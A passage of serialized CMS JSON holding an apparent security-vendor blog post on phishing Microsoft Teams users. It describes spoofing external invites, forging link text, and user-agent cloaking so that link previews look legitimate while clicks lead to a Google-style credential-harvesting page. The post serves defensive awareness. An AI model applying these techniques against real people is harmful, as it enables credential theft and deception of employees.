ta":263956,"content":263957},{},[263958,263961,263965,263968,263975],{"nodeType":173,"value":208927,"marks":263959,"data":263960},[],{},{"nodeType":173,"value":208931,"marks":263962,"data":263964},[263963],{"type":194},{},{"nodeType":173,"value":208936,"marks":263966,"data":263967},[],{},{"nodeType":186,"data":263969,"content":263970},{"uri":208941},[263971],{"nodeType":173,"value":208944,"marks":263972,"data":263974},[263973],{"type":194},{},{"nodeType":173,"value":208949,"marks":263976,"data":263977},[],{},{"nodeType":178,"data":263979,"content":263980},{},[263981,263984,263988],{"nodeType":173,"value":208956,"marks":263982,"data":263983},[],{},{"nodeType":173,"value":208960,"marks":263985,"data":263987},[263986],{"type":1646},{},{"nodeType":173,"value":1477,"marks":263989,"data":263990},[],{},{"nodeType":178,"data":263992,"content":263993},{},[263994],{"nodeType":173,"value":208971,"marks":263995,"data":263996},[],{},{"nodeType":235,"data":263998,"content":263999},{},[264000],{"nodeType":173,"value":208978,"marks":264001,"data":264002},[],{},{"nodeType":178,"data":264004,"content":264005},{},[264006],{"nodeType":173,"value":208985,"marks":264007,"data":264008},[],{},{"nodeType":178,"data":264010,"content":264011},{},[264012,264015,264022,264025,264032],{"nodeType":173,"value":208992,"marks":264013,"data":264014},[],{},{"nodeType":186,"data":264016,"content":264017},{"uri":208997},[264018],{"nodeType":173,"value":209000,"marks":264019,"data":264021},[264020],{"type":194},{},{"nodeType":173,"value":209005,"marks":264023,"data":264024},[],{},{"nodeType":186,"data":264026,"content":264027},{"uri":209010},[264028],{"nodeType":173,"value":209013,"marks":264029,"data":264031},[264030],{"type":194},{},{"nodeType":173,"value":209018,"marks":264033,"data":264034},[],{},{"nodeType":178,"data":264036,"content":264037},{},[264038,264041,264049],{"nodeType":173,"value":209025,"marks":264039,"data":264040},[],{},{"nodeType":186,"data":264042,"content":264043},{"uri":209030},[264044],{"nodeType":173,"value":209033,"marks":264045,"data":264048},[264046,264047],{"type":194},{"type":1646},{},{"nodeType":173,"value":37,"marks":264050,"data":264051},[],{},{"nodeType":178,"data":264053,"content":264054},{},[264055],{"nodeType":173,"value":209045,"marks":264056,"data":264057},[],{},{"nodeType":169,"data":264059,"content":264060},{},[264061],{"nodeType":173,"value":209052,"marks":264062,"data":264063},[],{},{"nodeType":178,"data":264065,"content":264066},{},[264067],{"nodeType":173,"value":209059,"marks":264068,"data":264069},[],{},{"nodeType":178,"data":264071,"content":264072},{},[264073],{"nodeType":173,"value":209066,"marks":264074,"data":264075},[],{},{"nodeType":178,"data":264077,"content":264078},{},[264079,264082,264089],{"nodeType":173,"value":209073,"marks":264080,"data":264081},[],{},{"nodeType":186,"data":264083,"content":264084},{"uri":209078},[264085],{"nodeType":173,"value":209081,"marks":264086,"data":264088},[264087],{"type":194},{},{"nodeType":173,"value":1477,"marks":264090,"data":264091},[],{},{"nodeType":178,"data":264093,"content":264094},{},[264095,264098,264105],{"nodeType":173,"value":209092,"marks":264096,"data":264097},[],{},{"nodeType":186,"data":264099,"content":264100},{"uri":88239},[264101],{"nodeType":173,"value":197982,"marks":264102,"data":264104},[264103],{"type":194},{},{"nodeType":173,"value":197986,"marks":264106,"data":264107},[],{},{"nodeType":312,"data":264109,"content":264112},{"target":264110},{"sys":264111},{"id":209109,"type":317,"linkType":318},[],{"nodeType":178,"data":264114,"content":264115},{},[264116],{"nodeType":173,"value":37,"marks":264117,"data":264118},[],{},{"items":264120},[264121,264123],{"sys":264122,"name":505},{"id":504},{"sys":264124,"name":509},{"id":508},{"items":264126},[264127],{"fullName":13977,"firstName":13978,"jobTitle":13979,"profilePicture":264128},{"url":13981},{"items":264130},[264131],{"fullName":513,"firstName":71176,"jobTitle":514,"profilePicture":264132},{"url":516},{"json":264134,"links":264411},{"nodeType":165,"data":264135,"content":264136},{},[264137,264142,264149,264159,264165,264171,264210,264215,264221,264227,264233,264239,264259,264265,264271,264333,264339,264345,264351,264356,264362,264368,264373,264379,264385,264390,264396],{"nodeType":312,"data":264138,"content":264141},{"target":264139},{"sys":264140},{"id":246037,"type":317,"linkType":318},[],{"nodeType":178,"data":264143,"content":264144},{},[264145],{"nodeType":173,"value":246043,"marks":264146,"data":264148},[264147],{"type":370},{},{"nodeType":178,"data":264150,"content":264151},{},[264152,264155],{"nodeType":173,"value":246051,"marks":264153,"data":264154},[],{},{"nodeType":173,"value":246055,"marks":264156,"data":264158},[264157],{"type":370},{},{"nodeType":178,"data":264160,"content":264161},{},[264162],{"nodeType":173,"value":246063,"marks":264163,"data":264164},[],{},{"nodeType":178,"data":264166,"content":264167},{},[264168],{"nodeType":173,"value":246070,"marks":264169,"data":264170},[],{},{"nodeType":250,"data":264172,"content":264173},{},[264174,264183,264192,264201],{"nodeType":254,"data":264175,"content":264176},{},[264177],{"nodeType":178,"data":264178,"content":264179},{},[264180],{"nodeType":173,"value":246083,"marks":264181,"data":264182},[],{},{"nodeType":254,"data":264184,"content":264185},{},[264186],{"nodeType":178,"data":264187,"content":264188},{},[264189],{"nodeType":173,"value":246093,"marks":264190,"data":264191},[],{},{"nodeType":254,"data":264193,"content":264194},{},[264195],{"nodeType":178,"data":264196,"content":264197},{},[264198],{"nodeType":173,"value":246103,"marks":264199,"data":264200},[],{},{"nodeType":254,"data":264202,"content":264203},{},[264204],{"nodeType":178,"data":264205,"content":264206},{},[264207],{"nodeType":173,"value":246113,"marks":264208,"data":264209},[],{},{"nodeType":312,"data":264211,"content":264214},{"target":264212},{"sys":264213},{"id":246120,"type":317,"linkType":318},[],{"nodeType":169,"data":264216,"content":264217},{},[264218],{"nodeType":173,"value":246126,"marks":264219,"data":264220},[],{},{"nodeType":178,"data":264222,"content":264223},{},[264224],{"nodeType":173,"value":246133,"marks":264225,"data":264226},[],{},{"nodeType":178,"data":264228,"content":264229},{},[264230],{"nodeType":173,"value":246140,"marks":264231,"data":264232},[],{},{"nodeType":178,"data":264234,"content":264235},{},[264236],{"nodeType":173,"value":246147,"marks":264237,"data":264238},[],{},{"nodeType":178,"data":264240,"content":264241},{},[264242,264245,264249,264252,264256],{"nodeType":173,"value":246154,"marks":264243,"data":264244},[],{},{"nodeType":173,"value":246158,"marks":264246,"data":264248},[264247],{"type":1646},{},{"nodeType":173,"value":246163,"marks":264250,"data":264251},[],{},{"nodeType":173,"value":246167,"marks":264253,"data":264255},[264254],{"type":1646},{},{"nodeType":173,"value":246172,"marks":264257,"data":264258},[],{},{"nodeType":178,"data":264260,"content":264261},{},[264262],{"nodeType":173,"value":246179,"marks":264263,"data":264264},[],{},{"nodeType":169,"data":264266,"content":264267},{},[264268],{"nodeType":173,"value":235856,"marks":264269,"data":264270},[],{},{"nodeType":246189,"data":264272,"content":264273},{},[264274,264283,264292,264308,264324],{"nodeType":254,"data":264275,"content":264276},{},[264277],{"nodeType":178,"data":264278,"content":264279},{},[264280],{"nodeType":173,"value":246199,"marks":264281,"data":264282},[],{},{"nodeType":254,"data":264284,"content":264285},{},[264286],{"nodeType":178,"data":264287,"content":264288},{},[264289],{"nodeType":173,"value":246209,"marks":264290,"data":264291},[],{},{"nodeType":254,"data":264293,"content":264294},{},[264295],{"nodeType":178,"data":264296,"content":264297},{},[264298,264301,264305],{"nodeType":173,"value":246219,"marks":264299,"data":264300},[],{},{"nodeType":173,"value":246223,"marks":264302,"data":264304},[264303],{"type":370},{},{"nodeType":173,"value":246228,"marks":264306,"data":264307},[],{},{"nodeType":254,"data":264309,"content":264310},{},[264311],{"nodeType":178,"data":264312,"content":264313},{},[264314,264317,264321],{"nodeType":173,"value":157297,"marks":264315,"data":264316},[],{},{"nodeType":173,"value":246241,"marks":264318,"data":264320},[264319],{"type":370},{},{"nodeType":173,"value":246246,"marks":264322,"data":264323},[],{},{"nodeType":254,"data":264325,"content":264326},{},[264327],{"nodeType":178,"data":264328,"content":264329},{},[264330],{"nodeType":173,"value":246256,"marks":264331,"data":264332},[],{},{"nodeType":169,"data":264334,"content":264335},{},[264336],{"nodeType":173,"value":246263,"marks":264337,"data":264338},[],{},{"nodeType":235,"data":264340,"content":264341},{},[264342],{"nodeType":173,"value":246270,"marks":264343,"data":264344},[],{},{"nodeType":178,"data":264346,"content":264347},{},[264348],{"nodeType":173,"value":246277,"marks":264349,"data":264350},[],{},{"nodeType":312,"data":264352,"content":264355},{"target":264353},{"sys":264354},{"id":246284,"type":317,"linkType":318},[],{"nodeType":235,"data":264357,"content":264358},{},[264359],{"nodeType":173,"value":246290,"marks":264360,"data":264361},[],{},{"nodeType":178,"data":264363,"content":264364},{},[264365],{"nodeType":173,"value":246297,"marks":264366,"data":264367},[],{},{"nodeType":312,"data":264369,"content":264372},{"target":264370},{"sys":264371},{"id":246304,"type":317,"linkType":318},[],{"nodeType":235,"data":264374,"content":264375},{},[264376],{"nodeType":173,"value":246310,"marks":264377,"data":264378},[],{},{"nodeType":178,"data":264380,"content":264381},{},[264382],{"nodeType":173,"value":246317,"marks":264383,"data":264384},[],{},{"nodeType":312,"data":264386,"content":264389},{"target":264387},{"sys":264388},{"id":246324,"type":317,"linkType":318},[],{"nodeType":169,"data":264391,"content":264392},{},[264393],{"nodeType":173,"value":71801,"marks":264394,"data":264395},[],{},{"nodeType":178,"data":264397,"content":264398},{},[264399,264402,264408],{"nodeType":173,"value":114452,"marks":264400,"data":264401},[],{},{"nodeType":186,"data":264403,"content":264404},{"uri":473},[264405],{"nodeType":173,"value":88194,"marks":264406,"data":264407},[],{},{"nodeType":173,"value":246345,"marks":264409,"data":264410},[],{},{"entries":264412},{"hyperlink":264413,"inline":264414,"block":264415},[],[],[264416,264421,264423,264427,264430],{"sys":264417,"__typename":5345,"title":264418,"caption":118,"layoutMode":118,"file":264419},{"id":246037},"Chat GPT Banner Ad",{"url":264420,"width":247659,"height":247660},"https://images.ctfassets.net/y1cdw1ablpvd/4fnlFRQbFXOyjdBePic5u7/14bb89c73bce33df0be45daafb8a611b/chat-gpt-image.png",{"sys":264422,"__typename":15269,"type":112637,"ctaText":247663,"buttonLabel":93499,"buttonColour":15273,"buttonUrl":118},{"id":246120},{"sys":264424,"__typename":5434,"title":264425,"arcadeDemoUrl":264426,"playText":5437},{"id":246284},"App Banner - ChatGPT","https://demo.arcade.software/4cOPL5gSyxt6z4wqSL7y?embed",{"sys":264428,"__typename":5434,"title":264429,"arcadeDemoUrl":231716,"playText":5437},{"id":246304},"App Banner - Guide users to approved apps",{"sys":264431,"__typename":5434,"title":264432,"arcadeDemoUrl":264433,"playText":5437},{"id":246324},"App Banners - Encourage SSO embed ","https://demo.arcade.software/mqoIhR7tM3wSCROmtens?embed","content:blog:introducing-in-browser-app-banners-set-guardrails-for-cloud-apps.json","blog/introducing-in-browser-app-banners-set-guardrails-for-cloud-apps.json","blog/introducing-in-browser-app-banners-set-guardrails-for-cloud-apps",{"_path":264438,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":264439,"ogImage":118,"summary":264441,"relatedBlogPostsCollection":264452,"title":252414,"subtitle":118,"metaTitle":252414,"synopsis":264454,"hashTags":118,"publishedDate":264455,"slug":252415,"tagsCollection":264456,"authorsCollection":264462,"content":264466,"_id":265258,"_type":5439,"_source":5440,"_file":265259,"_stem":265260,"_extension":5439},"/blog/phishing-microsoft-teams-for-initial-access",{"id":236144,"publishedAt":264440},"2024-03-21T08:53:37.285Z",{"json":264442},{"data":264443,"content":264444,"nodeType":165},{},[264445],{"data":264446,"content":264447,"nodeType":178},{},[264448],{"data":264449,"marks":264450,"value":264451,"nodeType":173},{},[],"In this article, we will highlight a number of spoofing and phishing strategies that can be employed by external attackers to target an organization using Teams in the initial access phase of the kill chain.",{"items":264453},[],"In this article, we will cover a number of spoofing and phishing strategies that can be employed by external attackers to target an organization using Teams.\n","2024-01-23T00:00:00.000Z",{"items":264457},[264458,264460],{"sys":264459,"name":505},{"id":504},{"sys":264461,"name":26137},{"id":26136},{"items":264463},[264464],{"fullName":8611,"firstName":8612,"jobTitle":8613,"profilePicture":264465},{"url":8615},{"json":264467,"links":265171},{"data":264468,"content":264469,"nodeType":165},{},[264470,264477,264525,264532,264539,264580,264587,264595,264602,264609,264616,264623,264656,264663,264708,264713,264720,264727,264734,264741,264748,264755,264762,264769,264775,264781,264788,264795,264801,264808,264815,264822,264829,264836,264861,264868,264875,264882,264889,264895,264902,264908,264915,264922,264928,264935,264943,264950,264957,264963,264970,264976,264983,264990,264997,265004,265011,265017,265023,265030,265037,265043,265050,265057,265064,265071,265077,265083,265090,265133,265139,265146,265153,265160,265165],{"data":264471,"content":264472,"nodeType":178},{},[264473],{"data":264474,"marks":264475,"value":264476,"nodeType":173},{},[],"We previously wrote two articles about phishing via Slack, the first for the initial access kill chain phase and the second for lateral movement and persistence. For those interested, the links are below:",{"data":264478,"content":264479,"nodeType":250},{},[264480,264502],{"data":264481,"content":264482,"nodeType":254},{},[264483],{"data":264484,"content":264485,"nodeType":178},{},[264486,264489,264499],{"data":264487,"marks":264488,"value":37,"nodeType":173},{},[],{"data":264490,"content":264493,"nodeType":1698},{"target":264491},{"sys":264492},{"id":236132,"type":317,"linkType":318},[264494],{"data":264495,"marks":264496,"value":264498,"nodeType":173},{},[264497],{"type":194},"Phishing through Slack for initial access",{"data":264500,"marks":264501,"value":37,"nodeType":173},{},[],{"data":264503,"content":264504,"nodeType":254},{},[264505],{"data":264506,"content":264507,"nodeType":178},{},[264508,264511,264522],{"data":264509,"marks":264510,"value":37,"nodeType":173},{},[],{"data":264512,"content":264516,"nodeType":1698},{"target":264513},{"sys":264514},{"id":264515,"type":317,"linkType":318},"1hU7XNIizp4vQXsiiQmqvI",[264517],{"data":264518,"marks":264519,"value":264521,"nodeType":173},{},[264520],{"type":194},"Phishing Slack for lateral movement and persistence",{"data":264523,"marks":264524,"value":37,"nodeType":173},{},[],{"data":264526,"content":264527,"nodeType":178},{},[264528],{"data":264529,"marks":264530,"value":264531,"nodeType":173},{},[],"Some readers asked what this looks like for Microsoft Teams and so we decided to write this article to show what similar attacks look like via Teams.",{"data":264533,"content":264534,"nodeType":178},{},[264535],{"data":264536,"marks":264537,"value":264538,"nodeType":173},{},[],"We’ll primarily be using the following SaaS attack techniques chained together:",{"data":264540,"content":264541,"nodeType":250},{},[264542,264561],{"data":264543,"content":264544,"nodeType":254},{},[264545],{"data":264546,"content":264547,"nodeType":178},{},[264548,264551,264558],{"data":264549,"marks":264550,"value":37,"nodeType":173},{},[],{"data":264552,"content":264553,"nodeType":186},{"uri":197770},[264554],{"data":264555,"marks":264556,"value":264557,"nodeType":173},{},[],"SAT1018 - IM phishing",{"data":264559,"marks":264560,"value":37,"nodeType":173},{},[],{"data":264562,"content":264563,"nodeType":254},{},[264564],{"data":264565,"content":264566,"nodeType":178},{},[264567,264570,264577],{"data":264568,"marks":264569,"value":37,"nodeType":173},{},[],{"data":264571,"content":264572,"nodeType":186},{"uri":208435},[264573],{"data":264574,"marks":264575,"value":264576,"nodeType":173},{},[],"SAT1019 - IM user spoofing",{"data":264578,"marks":264579,"value":37,"nodeType":173},{},[],{"data":264581,"content":264582,"nodeType":169},{},[264583],{"data":264584,"marks":264585,"value":264586,"nodeType":173},{},[],"Why focus on instant messengers?",{"data":264588,"content":264589,"nodeType":178},{},[264590],{"data":264591,"marks":264592,"value":264594,"nodeType":173},{},[264593],{"type":1646},"If you’ve read either of the previous articles on Slack, you can skip this introductory piece and jump straight to the next section.",{"data":264596,"content":264597,"nodeType":178},{},[264598],{"data":264599,"marks":264600,"value":264601,"nodeType":173},{},[],"They aren’t new, however, the original focus of IM apps was on internal communication and phishing and social engineering attacks are often external. Email remained the standards-based protocol that enabled external communication no matter what email vendor was in use. In recent years, however, instant messengers (IM) have become the primary method of communication for many businesses. I wanted to focus on IM here because if that’s where employees are communicating, it’s the best place to launch attacks against them. Even better, there’s a history of users placing a higher degree of trust in IM platforms than email, so it becomes a potentially easy target.",{"data":264603,"content":264604,"nodeType":178},{},[264605],{"data":264606,"marks":264607,"value":264608,"nodeType":173},{},[],"While IM platforms were initially used solely for internal communications, organizations quickly realized that IM platforms could be used to communicate with external groups, individuals, freelancers, and contractors, with the hope of fewer emails and more instant communications. ",{"data":264610,"content":264611,"nodeType":178},{},[264612],{"data":264613,"marks":264614,"value":264615,"nodeType":173},{},[],"We now have Slack Connect and Microsoft Teams external access to support this, with Slack Connect introduced in June 2020 and Teams introducing it in January 2022. This external access has increased the attack surface of these platforms considerably.",{"data":264617,"content":264618,"nodeType":178},{},[264619],{"data":264620,"marks":264621,"value":264622,"nodeType":173},{},[],"Despite decades of security research, email security appliances and user security training, email-based phishing and social engineering is still commonly successful. Now we have instant messenger platforms with:",{"data":264624,"content":264625,"nodeType":250},{},[264626,264636,264646],{"data":264627,"content":264628,"nodeType":254},{},[264629],{"data":264630,"content":264631,"nodeType":178},{},[264632],{"data":264633,"marks":264634,"value":264635,"nodeType":173},{},[],"Richer functionality than email, ",{"data":264637,"content":264638,"nodeType":254},{},[264639],{"data":264640,"content":264641,"nodeType":178},{},[264642],{"data":264643,"marks":264644,"value":264645,"nodeType":173},{},[],"Lacking centralized security gateways and other security controls common to email and ",{"data":264647,"content":264648,"nodeType":254},{},[264649],{"data":264650,"content":264651,"nodeType":178},{},[264652],{"data":264653,"marks":264654,"value":264655,"nodeType":173},{},[],"Unfamiliar as a threat vector to your average user compared with email. ",{"data":264657,"content":264658,"nodeType":178},{},[264659],{"data":264660,"marks":264661,"value":264662,"nodeType":173},{},[],"There’s also a sense of urgency associated with IM messages due to the conversational nature compared with emails. Combined with a history of increased trust, we have the ingredients for increased social engineering success.",{"data":264664,"content":264665,"nodeType":178},{},[264666,264670,264679,264683,264692,264696,264705],{"data":264667,"marks":264668,"value":264669,"nodeType":173},{},[],"There’s been an uptick recently in IM-based phishing research and real-world attacks, particularly for Microsoft Teams. For example, check out the ",{"data":264671,"content":264673,"nodeType":186},{"uri":264672},"https://labs.jumpsec.com/advisory-idor-in-microsoft-teams-allows-for-external-tenants-to-introduce-malware/",[264674],{"data":264675,"marks":264676,"value":264678,"nodeType":173},{},[264677],{"type":194},"great research from JumpSec",{"data":264680,"marks":264681,"value":264682,"nodeType":173},{},[]," on bypassing attachment protection for external Teams messages, the offensive tool ",{"data":264684,"content":264686,"nodeType":186},{"uri":264685},"https://github.com/Octoberfest7/TeamsPhisher",[264687],{"data":264688,"marks":264689,"value":264691,"nodeType":173},{},[264690],{"type":194},"TeamsPhisher",{"data":264693,"marks":264694,"value":264695,"nodeType":173},{},[]," and attacks distributing ",{"data":264697,"content":264699,"nodeType":186},{"uri":264698},"https://www.bleepingcomputer.com/news/security/microsoft-teams-phishing-attack-pushes-darkgate-malware/",[264700],{"data":264701,"marks":264702,"value":264704,"nodeType":173},{},[264703],{"type":194},"DarkGate malware via Teams",{"data":264706,"marks":264707,"value":1477,"nodeType":173},{},[],{"data":264709,"content":264712,"nodeType":312},{"target":264710},{"sys":264711},{"id":169040,"type":317,"linkType":318},[],{"data":264714,"content":264715,"nodeType":169},{},[264716],{"data":264717,"marks":264718,"value":264719,"nodeType":173},{},[],"IM user spoofing",{"data":264721,"content":264722,"nodeType":178},{},[264723],{"data":264724,"marks":264725,"value":264726,"nodeType":173},{},[],"The first consideration is the spoofing aspect. We’ve all seen techniques for spoofing emails, but there are many security controls like Sender Policy Framework (SPF) that can prevent direct spoofing of domains and email security gateways that can flag suspicious domains.",{"data":264728,"content":264729,"nodeType":178},{},[264730],{"data":264731,"marks":264732,"value":264733,"nodeType":173},{},[],"Those security controls don’t exist for IM, so we have new options for spoofing.",{"data":264735,"content":264736,"nodeType":235},{},[264737],{"data":264738,"marks":264739,"value":264740,"nodeType":173},{},[],"External IM invites",{"data":264742,"content":264743,"nodeType":178},{},[264744],{"data":264745,"marks":264746,"value":264747,"nodeType":173},{},[],"IM applications often make use of friendly display names for organization and employee names as well as user-chosen handles. These often don’t need to be unique either. One interesting aspect with Microsoft Teams is the behavior of this differs depending on if the external message request is received from a Teams organization or an individual Microsoft account user using Teams. ",{"data":264749,"content":264750,"nodeType":235},{},[264751],{"data":264752,"marks":264753,"value":264754,"nodeType":173},{},[],"External invite from individual Microsoft account",{"data":264756,"content":264757,"nodeType":178},{},[264758],{"data":264759,"marks":264760,"value":264761,"nodeType":173},{},[],"When messaging from an individual Microsoft account, we can choose the name to represent ourselves but we can’t choose an organization name. ",{"data":264763,"content":264764,"nodeType":178},{},[264765],{"data":264766,"marks":264767,"value":264768,"nodeType":173},{},[],"This is somewhat neutral in this case as we can’t spoof a legitimate organization name but the invite doesn’t show the real email address of the attacker’s account in this case and simply displays “External” as an indicator. Additionally, when messages are received from the external user the profile photo shown by the user does not show so we can’t spoof a known profile photo either.",{"data":264770,"content":264774,"nodeType":312},{"target":264771},{"sys":264772},{"id":264773,"type":317,"linkType":318},"zILCczBEC70U7rZCdQKTL",[],{"data":264776,"content":264780,"nodeType":312},{"target":264777},{"sys":264778},{"id":264779,"type":317,"linkType":318},"2JK0JDCZyPMF4btzGnFFHs",[],{"data":264782,"content":264783,"nodeType":235},{},[264784],{"data":264785,"marks":264786,"value":264787,"nodeType":173},{},[],"External invite from Teams organization",{"data":264789,"content":264790,"nodeType":178},{},[264791],{"data":264792,"marks":264793,"value":264794,"nodeType":173},{},[],"On the other hand, if we initiate an external connection request from a Teams organization then we can control our organization name but this is not of use to us in this case. This is because the connection request actually shows the email address of the user account. Therefore, we need to register a convincing email domain and we are relegated back to something much closer to standard email social engineering techniques.",{"data":264796,"content":264800,"nodeType":312},{"target":264797},{"sys":264798},{"id":264799,"type":317,"linkType":318},"7anwp3Aogq28Gfl31m57Sp",[],{"data":264802,"content":264803,"nodeType":178},{},[264804],{"data":264805,"marks":264806,"value":264807,"nodeType":173},{},[],"In this case, it seems better to use an individual Microsoft account with teams to spoof external invites as it’s not easy for a target user to tell if the user or organization requesting to connect is legitimate when they first receive this invitation. ",{"data":264809,"content":264810,"nodeType":178},{},[264811],{"data":264812,"marks":264813,"value":264814,"nodeType":173},{},[],"Whatever method is used, there’s also a curiosity incentive - you can’t see a first message from the user, so it’s tempting for the target user to accept in order to see the message, even if they then ignore it. This is one case where Teams actually provides an interesting defensive ability - it’s possible for the user to preview the message that has been sent without formally accepting the invitation first.",{"data":264816,"content":264817,"nodeType":178},{},[264818],{"data":264819,"marks":264820,"value":264821,"nodeType":173},{},[],"Whilst the initial invite spoofing options with Teams are not ideal from an attacker’s perspective (Slack certainly provides more interesting spoofing capabilities) there are certainly options to experiment with and it still allows for some capabilities not possible with email spoofing, such as hiding the email address and showing a display name only.",{"data":264823,"content":264824,"nodeType":178},{},[264825],{"data":264826,"marks":264827,"value":264828,"nodeType":173},{},[],"However, all an attacker needs to do is get a first connection and they have cleared the first hurdle. They can now launch attacks either immediately or in future. The conversational nature of IM apps makes it much easier to ramp up the conversation gradually towards an actual attack using a malicious link or attachment that is more likely to succeed.",{"data":264830,"content":264831,"nodeType":169},{},[264832],{"data":264833,"marks":264834,"value":264835,"nodeType":173},{},[],"Link preview spoofing",{"data":264837,"content":264838,"nodeType":178},{},[264839,264843,264848,264852,264857],{"data":264840,"marks":264841,"value":264842,"nodeType":173},{},[],"Another key issue is link preview spoofing. HTML allows a variety of ways to specify hyperlinks. In email, secure email gateways will often alert or block commonly abused types, such as forging a different URL as the link display text to what the underlying link points to. For example, an attacker could show the link as ",{"data":264844,"marks":264845,"value":264847,"nodeType":173},{},[264846],{"type":194},"https://www.google.com",{"data":264849,"marks":264850,"value":264851,"nodeType":173},{},[]," but direct it to ",{"data":264853,"marks":264854,"value":264856,"nodeType":173},{},[264855],{"type":194},"https://www.evil.com",{"data":264858,"marks":264859,"value":264860,"nodeType":173},{},[]," when it is clicked. Secure email gateways often perform a lot of other analysis of links, including domain analysis and active crawling to identify common phishing attacks.",{"data":264862,"content":264863,"nodeType":178},{},[264864],{"data":264865,"marks":264866,"value":264867,"nodeType":173},{},[],"On IM applications, however, this same standard of link analysis is not always present and the widespread introduction of link unfurling/previewing has also given additional options for spoofing links to hide their true source and increase social engineering success. ",{"data":264869,"content":264870,"nodeType":235},{},[264871],{"data":264872,"marks":264873,"value":264874,"nodeType":173},{},[],"Traditional link forging",{"data":264876,"content":264877,"nodeType":178},{},[264878],{"data":264879,"marks":264880,"value":264881,"nodeType":173},{},[],"We’ll start with a common traditional link forging scenario to see how Teams handles that, then show how link previews change the threat.",{"data":264883,"content":264884,"nodeType":178},{},[264885],{"data":264886,"marks":264887,"value":264888,"nodeType":173},{},[],"Here, we can see forging a link is permitted by Teams. A hover-over for a few seconds will show the real URL, but there is nothing stopping an attacker forging fake links if the user just clicks them without checking. This is something commonly prevented by secure email gateways and is something that generates an explicit warning when performed using Slack.",{"data":264890,"content":264894,"nodeType":312},{"target":264891},{"sys":264892},{"id":264893,"type":317,"linkType":318},"6WhYD92zZfMp9BqVdDD7oo",[],{"data":264896,"content":264897,"nodeType":178},{},[264898],{"data":264899,"marks":264900,"value":264901,"nodeType":173},{},[],"We can of course use friendly text to construct a link to our malicious domain too, something often used in email-based phishing. However, it still shows the real URL on hover-over and so it’s arguably of less use in teams when we can straight up forge fake links. A user is much less likely to check the hover-over if they think they’ve already seen the real URL as in the case of the forged link shown previously.",{"data":264903,"content":264907,"nodeType":312},{"target":264904},{"sys":264905},{"id":264906,"type":317,"linkType":318},"18Ziitk77uqffkzcPMAU48",[],{"data":264909,"content":264910,"nodeType":235},{},[264911],{"data":264912,"marks":264913,"value":264914,"nodeType":173},{},[],"Abusing link previews",{"data":264916,"content":264917,"nodeType":178},{},[264918],{"data":264919,"marks":264920,"value":264921,"nodeType":173},{},[],"It gets more interesting when we use links that Teams is able to unfurl to provide a link preview. Here we’ll show a legitimate example of posting one of our own blogs where Teams helpfully unfurls the URL and gives some context to the link as a preview:",{"data":264923,"content":264927,"nodeType":312},{"target":264924},{"sys":264925},{"id":264926,"type":317,"linkType":318},"2Zur3eM6QgogohMAO9bpZ7",[],{"data":264929,"content":264930,"nodeType":178},{},[264931],{"data":264932,"marks":264933,"value":264934,"nodeType":173},{},[],"This is very useful for the user and, despite the fact you can still see the domain as part of the preview, the rest of the preview dominates the display and gives a sense of legitimacy. The user can also hover-over the link to see the full URL, but they have much less reason to do that when seeing the link preview and if they notice the domain that’s displayed too.",{"data":264936,"content":264937,"nodeType":178},{},[264938],{"data":264939,"marks":264940,"value":264942,"nodeType":173},{},[264941],{"type":370},"So, how can we use this scenario maliciously?",{"data":264944,"content":264945,"nodeType":178},{},[264946],{"data":264947,"marks":264948,"value":264949,"nodeType":173},{},[],"The obvious attack scenario is to forge a different link preview for Teams than what is given to the user when they click the link. Then when the user clicks the link, they’ll be directed to our phishing page instead. ",{"data":264951,"content":264952,"nodeType":178},{},[264953],{"data":264954,"marks":264955,"value":264956,"nodeType":173},{},[],"We can do this by performing user agent specific processing of web requests. For example, Teams unfurling uses a user agent like the following:",{"data":264958,"content":264962,"nodeType":312},{"target":264959},{"sys":264960},{"id":264961,"type":317,"linkType":318},"703zjwvTs3DGZwkerIx9G8",[],{"data":264964,"content":264965,"nodeType":178},{},[264966],{"data":264967,"marks":264968,"value":264969,"nodeType":173},{},[],"Therefore, without even requiring much sophistication, we can use some simple python code to perform a redirect to a legitimate source when our web request handler sees this user agent. However, when a target user visits using a normal web browser we instead return a malicious page. The example python code below redirects to benign content for a Teams preview, while serving malicious content otherwise:",{"data":264971,"content":264975,"nodeType":312},{"target":264972},{"sys":264973},{"id":264974,"type":317,"linkType":318},"5W64wjVFHtjscIMWNQvFAT",[],{"data":264977,"content":264978,"nodeType":178},{},[264979],{"data":264980,"marks":264981,"value":264982,"nodeType":173},{},[],"If you’ve read our previous Slack article, you’ll recall that we also minimized the link text to a period so as to reduce the chances of the user performing a hover-over to see the real URL, whereas the link preview itself is much larger and clickable. ",{"data":264984,"content":264985,"nodeType":178},{},[264986],{"data":264987,"marks":264988,"value":264989,"nodeType":173},{},[],"The problem with Teams is that the domain portion of the link shows as part of the link preview as we saw above, which isn’t ideal as an attacker. Obviously, in a real attack we would register as convincing a domain as we could but we’d still rather the user either does not see it or sees a genuinely legitimate domain instead.",{"data":264991,"content":264992,"nodeType":178},{},[264993],{"data":264994,"marks":264995,"value":264996,"nodeType":173},{},[],"However, we also saw before that, unlike Slack, Teams allows full link forging without a warning. Hyperlinks are blue highlighted and much more prominent and so our attack strategy is best focused on presenting a forged legitimate URL that draws the user’s attention, along with a forged link preview and distracting them from the faded real domain that shows below.",{"data":264998,"content":264999,"nodeType":178},{},[265000],{"data":265001,"marks":265002,"value":265003,"nodeType":173},{},[],"The end result of this is that the user sees both a legitimate URL and a nice friendly link preview legitimately produced by Teams and Google Docs in real time, whereas if they click the link they’ll be taken to our phishing page instead. ",{"data":265005,"content":265006,"nodeType":178},{},[265007],{"data":265008,"marks":265009,"value":265010,"nodeType":173},{},[],"In this case, we have shown a Google style phishing page as an example for harvesting credentials. Hopefully, the user will assume their Google Docs session expired and then re-enter their credentials. See what the target user would see below:",{"data":265012,"content":265016,"nodeType":312},{"target":265013},{"sys":265014},{"id":265015,"type":317,"linkType":318},"46ZtHG4bp9bCdiCmmvciee",[],{"data":265018,"content":265022,"nodeType":312},{"target":265019},{"sys":265020},{"id":265021,"type":317,"linkType":318},"12F0HcFMo5Yd3rSaDX3W7q",[],{"data":265024,"content":265025,"nodeType":178},{},[265026],{"data":265027,"marks":265028,"value":265029,"nodeType":173},{},[],"As we can see, the phishing message generated in this case is pretty convincing. It shows a legitimate link to Google docs that is highlighted and a legitimate link preview too. The faded ngrok domain in the link preview is very easy to miss. However, clicking the link will take the user to our phishing page.",{"data":265031,"content":265032,"nodeType":178},{},[265033],{"data":265034,"marks":265035,"value":265036,"nodeType":173},{},[],"The diagram below shows how this attack works from a data flow 